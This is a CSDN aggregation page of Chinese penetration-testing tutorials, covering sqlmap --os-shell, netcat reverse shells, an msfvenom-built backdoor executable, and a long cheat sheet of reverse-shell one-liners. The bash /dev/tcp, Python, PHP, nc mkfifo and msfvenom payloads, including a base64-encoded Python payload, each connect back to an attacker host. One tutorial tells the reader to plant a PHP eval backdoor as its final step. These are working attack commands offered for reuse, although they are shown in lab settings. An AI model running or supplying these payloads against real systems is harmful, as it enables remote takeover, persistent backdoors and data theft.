php168shell_php 执行shell shell_exec - CSDN
精华内容
参与话题
  • sqlmap的--os-shell玩法

    千次阅读 2018-12-25 11:56:27
    首先找到注入点 证明存在注入漏洞 然后使用命令 sqlmap.py -r D:\1.txt -p username --random-agent --is-dba 看看是不是dba ...python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 -...

    首先找到注入点 证明存在注入漏洞

    然后使用命令

    sqlmap.py -r D:\1.txt -p username --random-agent --is-dba

    看看是不是dba

    这里不是dba所以不能使用--os-shell命令

    如果是的话

    例如

    python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 --os-shell

    便可直接执行命令

     

    展开全文
  • 用nc反弹shell真有意思哈哈

    万次阅读 2017-06-17 14:30:53
    先在bee(192.168.170.130)上面bee@bee-box:/tmp$ nc -vlp 4444 -e /bin/bash listening on [any] 4444 ... 192.168.170.1: inverse host lookup failed: Unknown host connect to [192.168.170.130] from (UNKNOWN) ...

    先在bee(192.168.170.130)上面

    bee@bee-box:/tmp$ nc -vlp 4444 -e /bin/bash
    listening on [any] 4444 ...
    192.168.170.1: inverse host lookup failed: Unknown host
    connect to [192.168.170.130] from (UNKNOWN) [192.168.170.1] 51226
    

    然后在自己机器(192.168.170.1)上

    ➜  exploit/others master ✓ nc 192.168.170.130 4444                  [14:07:23]

    这个时候在bee上,用netstat -plant应该可以已经看到TCP连接已经建立了。

    tcp        0      0 192.168.170.130:4444    192.168.170.1:51434     ESTABLISHED

    然后继续,暂时只是一个没有命令提示符的shell,可以用python来得到一个有交互式的shell。

    id
    uid=1000(bee) gid=1000(bee) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),125(sambashare),1000(bee)
    python -c "import pty; pty.spawn('/bin/bash')"
    bee@bee-box:/tmp$
    
    bee@bee-box:/tmp$ pwd
    pwd
    /tmp
    bee@bee-box:/tmp$ ifconfig
    ifconfig
    eth0      Link encap:Ethernet  HWaddr 00:0c:29:82:c4:aa
              inet addr:192.168.170.130  Bcast:192.168.170.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:fe82:c4aa/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:27851 errors:24921 dropped:0 overruns:0 frame:0
              TX packets:21029 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:3201942 (3.0 MB)  TX bytes:6392437 (6.0 MB)
              Interrupt:16 Base address:0x2024
    
    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:1006 errors:0 dropped:0 overruns:0 frame:0
              TX packets:1006 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:77917 (76.0 KB)  TX bytes:77917 (76.0 KB)
    
    bee@bee-box:/tmp$
    
    bee@bee-box:/tmp$ echo "caiqiqi"
    echo "caiqiqi"
    caiqiqi

    在这个nc反弹回来的shell里面,输入echo "caiqiqi"
    然后用wireshark抓包,follow TCP stream。由于是nc,所以并不是ssh加密的,是没有加密的TCP流量
    这里写图片描述。得到这么几个包。
    这里写图片描述

    当在web页面上使用nc -vlp 4444 -e /bin/bash时,得到的是www-data用户的shell。
    注意:如果你输入ifconfig,可能并没有回显,这可能是www-data用户的环境变量里没有/sbin的缘故,如果你有带命令提示符的shell的话,它会给你提示错误,否则可能什么响应都没有,你以为你已经断开shell了呢,其实没有。

    www-data@bee-box:/var/www/bWAPP$ ifconfig
    ifconfig
    Command 'ifconfig' is available in '/sbin/ifconfig'
    The command could not be located because '/sbin' is not included in the PATH environment variable.
    This is most likely caused by the lack of administrative priviledges associated with your user account.
    bash: ifconfig: command not found
    www-data@bee-box:/var/www/bWAPP$ echo $PATH
    echo $PATH
    /usr/local/bin:/usr/bin:/bin

    最后记得留下后门。

    www-data@bee-box:/var/www/bWAPP$ echo "<?php eval($_GET['x']);?>" > x.php
    echo "<?php eval($_GET['x']);?>" > x.php

    然而在我之后在正常的shell中却发现那个后门的内容并不是我之前输入的那样,

    bee@bee-box:/var/www/bWAPP$ cat x.php
    <?php eval(['x']);?>

    页面也报错了
    这里写图片描述

    展开全文
  • 利用msf生成后门拿shell

    千次阅读 2017-11-15 23:31:38
    kali x64:192.168.26.136 win7 x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpreter/reverse_tcp 输入以下命令生成后门qq.exe 然后...
    kali  x64:192.168.26.136
    win7  x86: 192.168.26.128


    先在kali终端输入msfvenom -l,打开payload目录

    然后找到payload windows/meterpreter/reverse_tcp

    输入以下命令生成后门qq.exe

    然后将生成的qq.exe移到win7然后打开msfconsole

    使用该攻击模块监听 use exploit/multi/handler

     然后设置payload


    show options 查看选项

    设置LHOSTkali地址

    然后run开始监听


    这时我们打开win7qq.exe文件

    就能看到Kali这边获取到一个Session


    输入jobs退出继续输入sessions -l查看session列表

    这里有一个session列表,sessionid1

    我们输入sessions -i 1,与该session交互


    输入getuid查看用户信息


    输入systinfo获取系统信息


    输入shell即可获取win7shell

    不过用这样方式拿的shell普遍都是很低的,还需提权


    展开全文
  • 常用的一句话反弹shell总结

    千次阅读 2019-05-20 15:43:56
    常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件...

    目录

    常用的一句话反弹shell总结

    1. bash直接反弹

    2. python一句话反弹shell

    3. python脚本反弹shell

    4. php一句话反弹shell

    5. php脚本反弹shell

    6. 使用nc命令获取靶机的反弹shell;

    7. 使用Kali自带的脚本文件获取反弹shell

    8. 使用msfvenom 获取一句话反弹shell


    常用的一句话反弹shell总结

    1. bash直接反弹

    1.1> 在监听机上开启监听

    nc -nvlp 8080

    1.2> 在目标主机上写入bash反弹一句话

    bash -i >& /dev/tcp/192.168.37.131/8080 0>&1
    • bash -i:产生一个bash的交互环境;
    • >&:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者;
    • /dev/tcp/192.168.37.131/8080:与目标主机192.168.37.131/8080端口建立一个TCP连接;
    • 0>&1:将标准输入与标准输出相结合,重定向到前面标准输出内容;

    1.3> 查看监听机上是否监听到shell;

    root@root:~# nc -nvlp 8080
    listening on [any] 8080 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 46567
    [tom@redhat home]$ whoami
    whoami
    tom
    [tom@redhat home]$ pwd
    pwd
    /home
    [tom@redhat home]$ 
    

    2. python一句话反弹shell

    2.1> 直接在Kali上监听1234端口,在靶机上执行如下命令:

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    [tom@redhat tmp]$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.37.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    
    

    2.2> 在Kali上查看监听到的1234端口,获取反弹shell;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35065
    sh-4.1$ whoami
    whoami
    tom
    sh-4.1$ 
    

    3. python脚本反弹shell

    3.1> 在Kali的web访问目录下准备shell.py;并执行python -m SimpleHTTPServer 80,搭建简易Web服务(注:web服务在/var/www/html目录下开启,当然也可以直接开启阿帕奇服务 /etc/init.d/apache2 start);

    root@root:~# cd /var/www/html/
    root@root:/var/www/html# vim shell.py
    root@root:/var/www/html# cat shell.py   #shell.py的内容
    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("192.168.37.131",1234))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/bash","-i"])
    root@root:/var/www/html# /etc/init.d/apache2 start     #开启Apache服务
    [ ok ] Starting apache2 (via systemctl): apache2.service.
    

    3.2> 将python shell脚本下载到目标靶机系统;(一般下载到/tmp目录下)

    [tom@redhat tmp]$ wget http://192.168.37.131/shell.py
    --2019-05-20 13:54:58--  http://192.168.37.131/shell.py
    正在连接 192.168.37.131:80... 已连接。
    已发出 HTTP 请求,正在等待回应... 200 OK
    长度:218 [text/x-python]
    正在保存至: “shell.py.1”
    
    100%[======================================>] 218         --.-K/s   in 0s      
    
    2019-05-20 13:54:58 (13.6 MB/s) - 已保存 “shell.py.1” [218/218])
    

    3.3> 下载成功后,在Kali上开启监听端口1234;并在靶机上运行python脚本 ;

    在Kali上开启监听端口1234:

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...

     在靶机上执行下载的python脚本文件:

    [tom@redhat tmp]$ python shell.py
    

    3.4>查看Kali上监听的端口1234,获取靶机的反弹shell;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35053
    [tom@redhat tmp]$ whoami
    whoami
    tom
    [tom@redhat tmp]$ ifconfig
    ifconfig
    eth1      Link encap:Ethernet  HWaddr 00:0C:29:EF:E0:1D  
              inet addr:192.168.37.143  Bcast:192.168.37.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:feef:e01d/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:2605 errors:0 dropped:0 overruns:0 frame:0
              TX packets:286 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
              RX bytes:186570 (182.1 KiB)  TX bytes:24850 (24.2 KiB)
    

    4. php一句话反弹shell

    4.1> 直接在Kali上监听1234端口,在靶机上执行如下命令:

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    [tom@redhat tmp]$ php -r '$sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
    

    4.2> 在Kali上查看监听到的1234端口,获取反弹shell;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35064
    sh-4.1$ whoami
    whoami
    tom
    sh-4.1$ 

    4.3> 将shell转化为交互的tty;

    python -c 'import pty;pty.spawn("/bin/bash")'

    sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
    python -c 'import pty;pty.spawn("/bin/bash")'
    [tom@redhat tmp]$ whoami 
    whoami
    tom
    [tom@redhat tmp]$ 
    

    5. php脚本反弹shell

    5.1> 在KALI中添加shell.php;并开启Apache服务;

    <?php $sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

    /etc/init.d/apache2 start

    root@root:~# cd /var/www/html/
    root@root:/var/www/html# vim shell.php
    root@root:/var/www/html# cat shell.php    #php脚本
    <?php $sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>
    root@root:/var/www/html# /etc/init.d/apache2 start   #开启Apache服务
    [ ok ] Starting apache2 (via systemctl): apache2.service.
    root@root:/var/www/html# 
    

    5.2> 在靶机上上传该脚本;

    [tom@redhat tmp]$ wget http://192.168.37.131/shell.php
    --2019-05-20 14:21:56--  http://192.168.37.131/shell.php
    正在连接 192.168.37.131:80... 已连接。
    已发出 HTTP 请求,正在等待回应... 200 OK
    长度:80 [text/plain]
    正在保存至: “shell.php”
    
    100%[======================================>] 80          --.-K/s   in 0s      
    
    2019-05-20 14:21:56 (4.53 MB/s) - 已保存 “shell.php” [80/80])
    

    5.3> 下载成功后,在Kali上开启监听端口1234;并在靶机上运行python脚本 ;

    在Kali上开启监听端口1234:

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...

     在靶机上执行下载的php脚本文件:

    [tom@redhat tmp]$ php shell.php
    

    5.4>查看Kali上监听的端口1234,获取靶机的反弹shell;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35063
    sh-4.1$ whoami
    whoami
    tom
    sh-4.1$ ifconfig
    ifconfig
    eth1      Link encap:Ethernet  HWaddr 00:0C:29:EF:E0:1D  
              inet addr:192.168.37.143  Bcast:192.168.37.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:feef:e01d/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:2748 errors:0 dropped:0 overruns:0 frame:0
              TX packets:369 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
              RX bytes:204505 (199.7 KiB)  TX bytes:32844 (32.0 KiB)
    

    6. 使用nc命令获取靶机的反弹shell;

    6.1> 在靶机上输入如下命令;

    [tom@redhat tmp]$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.37.131 1234 >/tmp/f;
    

    6.2> 在Kali上监听1234端口;

    root@root:/var/www/html# nc -nvlp 1234
    listening on [any] 1234 ...
    connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35067
    sh-4.1$ whoami
    whoami
    tom
    sh-4.1$ 
    

    7. 使用Kali自带的脚本文件获取反弹shell

    7.1> 查看Kali上的php-reverse-shell.php,另存为并修改监听的IP地址;

    root@root:~# cd /usr/share/webshells/
    root@root:/usr/share/webshells# ls
    asp  aspx  cfm  jsp  perl  php
    root@root:/usr/share/webshells# cd php
    root@root:/usr/share/webshells/php# ls
    findsock.c        php-findsock-shell.php  qsd-php-backdoor.php
    php-backdoor.php  php-reverse-shell.php   simple-backdoor.php
    root@root:/usr/share/webshells/php# cat php-reverse-shell.php
    <?php
    // php-reverse-shell - A Reverse Shell implementation in PHP
    // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
    //
    // This tool may be used for legal purposes only.  Users take full responsibility
    ......
    root@root:/usr/share/webshells/php# cp php-reverse-shell.php /var/www/html/
    root@root:/usr/share/webshells/php# cd /var/www/html/
    root@root:/var/www/html# ls
    1.html   a.js             index.html               shell.elf
    1.php    decode.py        index.nginx-debian.html  shell.php
    2.html   dirty.c          php-reverse-shell.php    shell.py
    37292.c  dirtycow-master  shell.c                  shell.txt
    root@root:/var/www/html# vim php-reverse-shell.php 
    root@root:/var/www/html# cat php-reverse-shell.php   #修改监听的IP地址
    ......
    // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
    
    set_time_limit (0);
    $VERSION = "1.0";
    $ip = '192.168.37.131';  // CHANGE THIS      #修改IP地址
    $port = 1234;       // CHANGE THIS
    $chunk_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a; w; id; /bin/sh -i';
    $daemon = 0;
    $debug = 0;
    ......
    root@root:/var/www/html# /etc/init.d/apache2 start
    [ ok ] Starting apache2 (via systemctl): apache2.service.
    

    7.2> 将文件上传到靶机上;并监听1234端口,执行文件,获取反弹shell;

    8. 使用msfvenom 获取一句话反弹shell

    当我们不记得前面说的所有反弹shell的反弹语句时,只要我们有Metasploit,就可以生成我们所需要的各类命令行一句话,具体使用方法如下:

    8.1 查询 payload 具体路径

    我们直接可以使用 msfvenom -l 结合关键字过滤(如cmd/unix/reverse),找出我们需要的各类反弹一句话payload的路径信息。

    root@root:~# msfvenom -l payloads |grep "cmd/unix/reverse"
        cmd/unix/reverse                                    Creates an interactive shell through two inbound connections
        cmd/unix/reverse_awk                                Creates an interactive shell via GNU AWK
        cmd/unix/reverse_bash                               Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
        cmd/unix/reverse_bash_telnet_ssl                    Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.
        cmd/unix/reverse_lua                                Creates an interactive shell via Lua
        cmd/unix/reverse_ncat_ssl                           Creates an interactive shell via ncat, utilizing ssl mode
        cmd/unix/reverse_netcat                             Creates an interactive shell via netcat
        cmd/unix/reverse_netcat_gaping                      Creates an interactive shell via netcat
        cmd/unix/reverse_nodejs                             Continually listen for a connection and spawn a command shell via nodejs
        cmd/unix/reverse_openssl                            Creates an interactive shell through two inbound connections
        cmd/unix/reverse_perl                               Creates an interactive shell via perl
        cmd/unix/reverse_perl_ssl                           Creates an interactive shell via perl, uses SSL
        cmd/unix/reverse_php_ssl                            Creates an interactive shell via php, uses SSL
        cmd/unix/reverse_python                             Connect back and create a command shell via Python
        cmd/unix/reverse_python_ssl                         Creates an interactive shell via python, uses SSL, encodes with base64 by design.
        cmd/unix/reverse_r                                  Connect back and create a command shell via R
        cmd/unix/reverse_ruby                               Connect back and create a command shell via Ruby
        cmd/unix/reverse_ruby_ssl                           Connect back and create a command shell via Ruby, uses SSL
        cmd/unix/reverse_socat_udp                          Creates an interactive shell via socat
        cmd/unix/reverse_ssl_double_telnet                  Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
        cmd/unix/reverse_stub                               Creates an interactive shell through an inbound connection (stub only, no payload)
        cmd/unix/reverse_zsh                                Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.
    

    8.2> 生成我们所需要的一句话反弹shell;

    msfvenom -p cmd/unix/reverse_bash lhost=192.168.37.131 lport=1234 R      #bash反弹一句话

    msfvenom -p cmd/unix/reverse_netcat lhost=192.168.37.131 lport=1234 R    #nc反弹一句话

    msfvenom -p cmd/unix/reverse_python lhost=192.168.37.131 lport=1234 R  #python反弹一句话

    ......

    root@root:~# msfvenom -p cmd/unix/reverse_bash lhost=192.168.37.131 lport=1234 R
    No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    No Arch selected, selecting Arch: cmd from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 68 bytes
    0<&178-;exec 178<>/dev/tcp/192.168.37.131/1234;sh <&178 >&178 2>&178
    
    root@root:~# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.37.131 lport=1234 R
    No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    No Arch selected, selecting Arch: cmd from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 93 bytes
    mkfifo /tmp/fqzh; nc 192.168.37.131 1234 0</tmp/fqzh | /bin/sh >/tmp/fqzh 2>&1; rm /tmp/fqzh 
    
    root@root:~# msfvenom -p cmd/unix/reverse_python lhost=192.168.37.131 lport=1234 R
    No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    No Arch selected, selecting Arch: cmd from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 573 bytes
    python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAsICAgICAgc3VicHJvY2VzcyAgICAgICAsICAgICAgb3MgICAgICAgICA7IGhvc3Q9IjE5Mi4xNjguMzcuMTMxIiAgICAgICAgIDsgcG9ydD0xMjM0ICAgICAgICAgOyBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAgLCAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgICA7IHMuY29ubmVjdCgoaG9zdCAgICAgICAsICAgICAgcG9ydCkpICAgICAgICAgOyBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDApICAgICAgICAgOyBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDEpICAgICAgICAgOyBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDIpICAgICAgICAgOyBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
    

    8.3> 在Kali上监听端口,在靶机上执行生成的一句话shell;即可获取目标的反弹shell;

    展开全文
  • 在本机上想通过shell脚本执行远程机器上的命令,其实很简单,只要在ssh 的后面加上 #!/bin/bash ssh root@192.168.1.102 ####从这里开始都是在远程机器上执行命令啦 cd /tmp/test/ rm -f test.txt cat ...
  • 使用shell获取ip地址

    千次阅读 2011-04-19 11:48:00
    ifconfig返回的信息中包括IP地址,但要在Shell中获取当前IP地址,则要麻烦一些 获取方法由于不同系统中ifconfig返回信息的格式有一定差别,故分开讨论:[1]Linux:LC_ALL=C ifconfig | grep'inet addr:'| grep -v '...
  • 该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 二、修复方案 Thinkphp v5.0.x...
  • 话不多说直接抛代码 curl -H "Expect:" -F "passport=monitor_134" -F "data=@/root/monitor/result/mid_1_rule_1.txt" http://192.168.1.207:80/monitor2.00
  • msfvenom Options: -p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, –list [module_type] 列出指定模块的所有可用资源....
  • 生成msf常用payload

    千次阅读 2018-06-04 10:49:29
    msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。...
  • phpweb后台拿shell方法

    千次阅读 2016-11-19 09:06:58
    首先登录后台admin.php(默认后台admin.php) 有的phpweb网站存在万能密码登录 帐号密码都输入:admin 'or '1'='1直接登录 登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把www.xxx.com ...
  • metasploit 使用教程

    万次阅读 多人点赞 2016-01-20 10:27:29
    METASPLOIT基础入门 1、基础知识 ...Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。...Metasploit Framework...
  • 192.168.40.152 123456 192.168.40.182 123456 循环读取文件内容的方法并传递参数 dir=/home/hanson/hsshell/sysLoginSh while read line do host=`echo $line| awk '{print $1}'` passwd=`echo $line | awk ...
  • Redis未授权访问漏洞利用总结

    万次阅读 2018-07-06 11:04:43
    0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis...
  • Linux反弹shell

    千次阅读 2020-08-30 11:15:32
    目录 Bash反弹shell Python反弹shell 其他命令反弹shell 写入命令到定时任务文件 写入SSH公钥 ...当我们可以在远程Linux主机上执行任意...Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,...
  • php利用sudo权限执行shell脚本

    万次阅读 2017-03-17 11:47:30
    php作为一门服务器端脚本语言,也是可以调用系统命令的,这其中就包括了执行shell脚本 最近有一个需求,由于http的表单方式上传文件过慢,需要通过其他方式传输文件,讨论了scp与rsync后 最终决定使用scp工具 编写test....
  • Shell下curl的使用

    万次阅读 2012-09-25 23:22:02
    curl是一个访问url的工具,可以用他构造http request报文,且可以解析服务器返回的http response,额外还支持cookie特性,可以用curl完成web浏览器的基本功能。... 通用语法: ...curl [option] [URL...] ...
  • nc反弹cmdshell

    千次阅读 2018-08-08 22:26:14
    前提条件:需要公网ip ...往公网反弹cmdshell:  ncat 192.168.174.129 8080 -e C:\PhpStudy20180211\phpStudySetup\PHPTutorial\WWW\cmd.exe 或者  ncat -e cmd.exe 192.168.174.129 8080 反弹成功 ...
  • metasploit渗透测试笔记(内网渗透篇)

    万次阅读 2016-01-23 17:43:25
    x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shell reverse_tcp ...
1 2 3 4 5 ... 20
收藏数 19,570
精华内容 7,828
关键字:

php168shell